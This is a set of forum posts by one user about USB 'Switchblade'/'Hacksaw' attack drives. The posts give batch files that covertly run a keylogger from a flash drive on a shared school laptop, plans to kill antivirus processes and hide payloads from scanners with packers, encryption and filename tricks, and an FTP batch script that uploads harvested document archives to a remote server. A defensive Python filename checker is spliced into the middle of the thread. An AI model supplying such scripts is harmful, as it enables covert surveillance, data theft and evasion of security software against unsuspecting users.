sc0rpi0

Posts posted by sc0rpi0

  1. Recently, I tried to connect to my computer via psexec.

    I used this command:

    psexec machinename[external ip] cmd.exe

    I received the notice that I must

    "Make sure that the default admin$ share is enabled on [my machinename]"

    Any suggestions on how to go about doing this? What does this do?

    Preferably through the command line, not the GUI.

    Much appreciated.

  2. Some AV products have random names for their scanning, so looking for process names may not help in some situations.

    True; however, it may be as simple as searching for default installation directories such as "C:\Program Files" or even the registry.

    Side bar: Has anyone tried to end AV processes by using the taskkill /t (which kills child processes as well)? Currently not running any AV on my VM for packing reasons for this app...

    Yes, that is a good idea. Unfortunately, I wouldn't be the one to ask.

    Although "taskkill /t" may work, I would recommend using pskill from Sysinternals.

    I wonder...would this killing of child processes do the trick? [thinking out loud]

    Not only can it kill child processes, but system processes as well.

  3. Some AV products have random names for their scanning, so looking for process names may not help in some situations.

    This method has been tested with McAfee and it works.

    Exactly which antivirus products are you referring to?

  4. I'm a newb, I've read previous posts, but I still can't get a keylogger to auto run off my thumb drive.  Like I said it's a U3-enabled, Cruzer Micro 1GB drive.  I'm confused about the scripts, finding a free keylogging program to run from the script, and saving the script to the U3 file system.  If someone could post step by step instructions that would be great! Thanks! (Do I need a script or do I use the U3 script?)

    I've been told I need to modify the read-only "CDROM" division of a U3 drive to read and write access.  How can this be done?

    A user from the binary revolution forum gave this link.  I'm kinda confused on the instructions so if someone could make it simpler for me that would be great!  hxxp: mcgrewsecurity. com/research/hackingU3/

    Can this be done without the user knowing or having to open anything. I want to be able to plug this in, have it run in the background, and record key strokes when I'm not in the class room.

    Edit-- In case you're wondering the reason, we're having a problem with kids using the media laptop to check MySpace at school and it's really annoying and hard to catch them.  I'm only in the room maybe 1 or 2 periods a day so it's really hard to keep an eye on it.  It is the only laptop in the entire school that has admin privileges on the network firewall.  On occasion we use a clip or two from YouTube or MySpace in the monthly video we produce.  This is not malicious in any way!!! (I don't know the forum rules yet). I eventually want to publish a simple walk through for hacking the U3 if it hasn't been done.

    P.S. This link is NOT helpful. Where is the "step 2" zip file it mentions??? http://wiki.hak5.org/wiki/Sandisk_U3_ISO_Hack

    Unfortunately, I don't have a U3. This is how I would do it with a non-U3 drive.

    This uses pskill from Sysinternals.

    Make a file called file.txt in the root directory of your flash drive.

    Don't have anything installed on the computer except this batch file in some random system directory.

    Then have it launch.

    Make sure that the keylogger runs *without* installing anything on the target computer.

    Have a batch file like this run upon autorun:

    start.bat:

      [your keylogger executable]
      call check.bat
      exit

    check.bat:

      :begin
      if exist "%~d0file.txt" goto begin
      pskill.exe -t "[keylogger process]"
      exit

    Sorry this reply is so brief.

    I am making the assumption that you know how to make batch files.

    Good luck!

  5. Interesting, but that doesnt get past the fact that you need to actually run the executables. Using a rar for temporary storage will be nice, but how will that help getting around running the apps?

    The plan is that the nasties [switchblade apps that avs don't like] will be hidden from detection.

    Before the nasties are extracted, a batch file or another executable will be run, hopefully killing the av.

    I am currently compiling the list of av processes and will probably post that sometime during winter break.

    However, I may need a little assistance because Google doesn't find all AV processes.

  6. I'd just like to say that password protected RARs also don't get detected by antiviruses, I'd consider using RARs since they are more widely used but it's up to you.

    Thanks for the fantastic suggestion.

    I just tried it and it veils the files from any av intervention.

    Thanks again for the idea.

  7. I've been reading this thread continuously hoping for a solution.  It wasn't until I finally took some initiative that I may have figured out a solution.

    I tested this on XP SP2 running Symantec AV with definition files current as of 12/14/2007.

    On a different box, I used ccrypt to encrypt the files.  This renames the files to <program>.exe.cpt.  This successfully passed Symantec scans.

    I'm hacking some c++ now which will follow this paradigm:

    -Scan computer for known AV

    -If AV present, try to kill the process

    -If kill successful, decrypt payload

    -Run payload & encrypt files back

    Let me know what you think.  Once I have some time to get a VM up and running, I'll test ccrypt with other AVs.  As far as I know though, this should work against all signature based ones...

    That is a good idea...don't mean to steal your idea, but I have been working on a huge list of AV and firewall processes to kill also. It's nearly done and will probably be posted on the USB hacks forum soon.

    I will consider using this ccrypt...it looks interesting. Could you please post the commands for what you are trying to do?

    Keep up the good work!  :)

    Thanks for taking the initiative. Please post any new results so that we may become equally enlightened.

    Thanks again.

  8. So has anybody got this going?

    Good question.

    I am currently on my non-hacking computer.

    I know it sounds odd, but I have a separate computer for testing even safe software [being the paranoid person I am]

    It will probably be down until somewhere in winter break  :(  Sorry if this causes anyone any inconvenience.

    Once it's fixed, I'll test the packaging tools and reply on this topic.

    Eventually, it should show up in your "Show new replies to your posts" tab thing.

    If anyone else would like to try, please go right ahead. If it's not too much trouble, post your results here.

    For test binding purposes, I would recommend trying "pspv.exe" in the switchblade USB package. My AV goes nuts when I unzip this.

    Or another that your av would typically pick up without binding.

    Good luck!


  9. As it has already been said, if you pack/crypt an exe your AV might detect it by general detection of the cryptor. So you need a private packer.  :-?

    As private means NOT public there are no links  :D

    But you can also try one of the public known packers, like Yoda's Protector

    Is this better than UPX or iexpress [all Windows versions come with this; just type "iexpress" into the Run box]?

    Thanks very much.

  10. Gmail:

    "Over 5782.718985 megabytes (and counting) of free storage so you'll never need to delete another message."

    That's 5.6 gigs if I don't totally suck at math.

    http://yodel.yahoo.com/2007/03/27/yahoo-ma...ity-and-beyond/

    Yahoo has unlimited email storage, let me know when you can find an FTP that offers more than unlimited...

    Just on the side, you really need to pay more attention to the Internet.

    Less secure = .htaccess - how do you get the files there in the first place?  I haven't done things through FTP in a while, but last I checked, to upload a file someone needs to have the login info.  Which means you have to leave that info somewhere on the PC.  For email, all you need is a 'to' address, you can send through a throwaway account.

    I suppose you are right.

    Personally, I don't care about people's videos and pictures.

    So I filter them out, leaving only text files and Word documents.

    Usually 250 mb is enough for these.

    http://www.esmartstart.com/

    Just my personal preference.

    Automatic FTP can be done with merely a .bat file and a .txt file.

    And yes, leaving the username and password is necessary.

    Really simple. Here is how it's done:

    [BATCH FILE]

      ftp -s:send.txt

    [TEXT FILE - called send.txt]

      open [ftp.yourserver.com]
      [username]
      [password]
      binary
      prompt n
      put "archive.rar"
      bye

    Still, I guess email *is* more secure and harder to trace.

    Thanks.

  11. Hi,

    How can I modify USB Hacksaw to copy certain files?

    I want it to copy and send only (.doc) files..

    Thank you.

    If you want a tutorial, here's a good one.

    http://www.usbhacks.com/2006/10/29/how-to-...sb-flash-drive/

    If you just want the example files, download the "Demo Source Files" which can be accessed

    in a gray box near the title [centered right].

    Just incorporate the commands into go.bat.

    If you have any questions, ask.

    Good Luck!

  12. stop and think...

    do you want to send the mail out or do you want to get the mail in?

    and remember the account you use will have the name and password in plaintext so if anyone finds the files they'll have all the account information

    I just tried both. Neither worked.

    All my account information is correct. My firewall is set up to allow blat and stunnel to internet access.

    Any suggestions?

  13. get yourself a private packer/crypter, and your problems are solved ;)

    Where do I pick up one of these?

    I am presuming that when you say "private" you mean secret: not open to the public.

    If so, then my previous question was very pointless. Ignore it then.

    There aren't many of these around, are there? Even if I manage to find one, how do I know it won't backfire?

    I know I'm paranoid but don't I have a reason to be?

    Thanks.

  14. Here's something interesting:

    People at SecuriTeam (http://www.securiteam.com) have found a simple way to bypass the virus checking capability of several popular antiviruses. The method is as simple as it can get. Just rename the virus infected file in such a way that it contains non-printable ASCII characters.

    Several AVs fail to open/test this file as they cannot handle the non-printable ASCII in the filenames.

    Several antivirus programs do not scan filenames that contain non-printable ASCII characters; in addition, instead of blocking them they are simply ignored.

    Details

    Vulnerable Systems:

    * BitDefender Antivirus

    * Trustix Antivirus

    * Avast! Antivirus

    * Cat Quick Heal Antivirus

    * Abacre Antivirus

    * VisNetic Antivirus (bypass only with manual scan)

    * AntiVir Personal Edition Antivirus

    * Clamav for Windows Antivirus

    * Antiy Ghostbusters Professional Edition

    Immune Systems:

    * Kaspersky Antivirus

    * AVG Free

    Several AntiVirus programs do not scan files that contain extended ASCII characters and characters that are lower than 0x20. An attacker can rename a malicious filename to such a filename which in turn will cause the AntiVirus programs to ignore the filename.

    Full info:- http://www.securiteam.com/windowsntfocus/5TP0M2KGUQ.html

    Not all major AVs are tested there, but you can test your AV for yourself. Get the Eicar test pattern file and rename the file so that it contains a Non-printable ASCII character.

    For example, if xyz.exe is the filename then you can use xyz[ALT+1].exe; pressing ALT+number would get an ASCII character.

    Get the Eicar test virus here:- http://www.eicar.org/anti_virus_test_file.htm

    Taken from http://www.techspot.in/forum/archive/index.php?t-1872.html

    Thanks.

    This seems to work...sort of...only with some executables.

    I am currently looking for a solution to veil executables from the larger AVs such as Norton and McAfee.

    Maybe "encrypt" was not the correct word.

    What I am trying to do is package a file so that the contents can be run but not detected.

    I have tried UPX and iexpress and managed to hide a file from AV but not when it is being run.  :(

    Any more ideas?

    Thanks.
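    A defender's check for the filename trick quoted above, added here as an example that is not part of the original thread: it flags names containing control characters, DEL or non-ASCII code points so they can be submitted for an explicit scan instead of being silently skipped. The sample filenames are constructed for the demonstration.

```python
import os

# Constructed sample filenames (not taken from the thread). ALT+1 on a Windows
# keyboard typically yields the non-ASCII glyph U+263A; the \x01 case covers
# Unix-like filesystems, where raw control characters are legal in names.
SAMPLE_NAMES = [
    "report.docx",
    "xyz\u263a.exe",        # ALT+1 style glyph before the extension
    "setup\u00ff.exe",      # extended (non-ASCII) character
    "bad\x01.exe",          # raw control character below 0x20
    "notes.txt",
    "tool\x7f.com",         # DEL is non-printable as well
]

def has_unscannable_chars(name: str) -> bool:
    """True if a filename contains a code point below 0x20, DEL, or above 0x7E."""
    return any(ord(ch) < 0x20 or ord(ch) >= 0x7F for ch in name)

def escape_name(name: str) -> str:
    """Escape a filename so the log line itself stays printable ASCII."""
    return name.encode("unicode_escape").decode("ascii")

def find_suspicious_names(names):
    """Return the escaped filenames a scanner might skip, in input order."""
    return [escape_name(n) for n in names if has_unscannable_chars(n)]

def scan_directory(path):
    """Walk a real directory tree; return (directory, escaped name) pairs to rescan."""
    hits = []
    for root, _dirs, files in os.walk(path):
        for f in files:
            if has_unscannable_chars(f):
                hits.append((root, escape_name(f)))
    return hits

if __name__ == "__main__":
    for escaped in find_suspicious_names(SAMPLE_NAMES):
        print("flag for explicit scan:", escaped)
```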

  15. nope that's you're server you can/should change it to googles

    I know this may be a very stupid question, but what is Google's mail server?

    I'm very new to sending mail outside the nice Gmail interface.

    An even more obvious question: would it be the incoming or outgoing server? I think it's the outgoing, but am not entirely sure.

    the two servers are these I believe:

    incoming: pop.gmail.com

    outgoing: smtp.gmail.com

    Much appreciated.

  16. In order per question mark:

    The U3 Launchpad is the software that lets you run programs from the U3 start menu.  It's important to have if you log onto a domain account frequently; sometimes the computer will not create both partitions of the drive and by double clicking the CD shaped U3 Launchpad, you can spawn the flash (writable) partition of the drive.

    All the crappy software.

    No, probably not.  To the best of my knowledge uninstalling Launchpad removes the CD partition.

    You can't  :P.  And honestly, there's no reason to uninstall it, it's only a couple megs out of 2-4 gigs.  You can uninstall all of the programs that come with it (through the Launchpad menu) and tell it not to load automatically though.

    If you merely insert the drive and have the Launchpad off, no, besides the fact that Windows configures drivers for every flash drive you ever plug in.

    N/A

    Sandisks are nice, the 4 gig cruzer mini looks really good right now.  You could if you wanted to, hypothetically speaking of course, install full apps like Photoshop and Office, assuming of course that you own them and the license permits it.  Flash them to the u3 partition and you're all set.

    I actually just bought a new 4 gig cruzer mini for that purpose, Office 2007 and Photoshop/dreamweaver  :-P.

    Thanks for your last response. It answered a lot of my questions.

    The reason why I was wondering about the automatic launching of programs is the switchblade/or hacksaw.

    I've always wanted to test out the u3 version but haven't been able to.

    Do I need to install a different launchpad for this purpose? Is it possible to get back my old launchpad after testing the switchblade launchpad?

    Much appreciated.
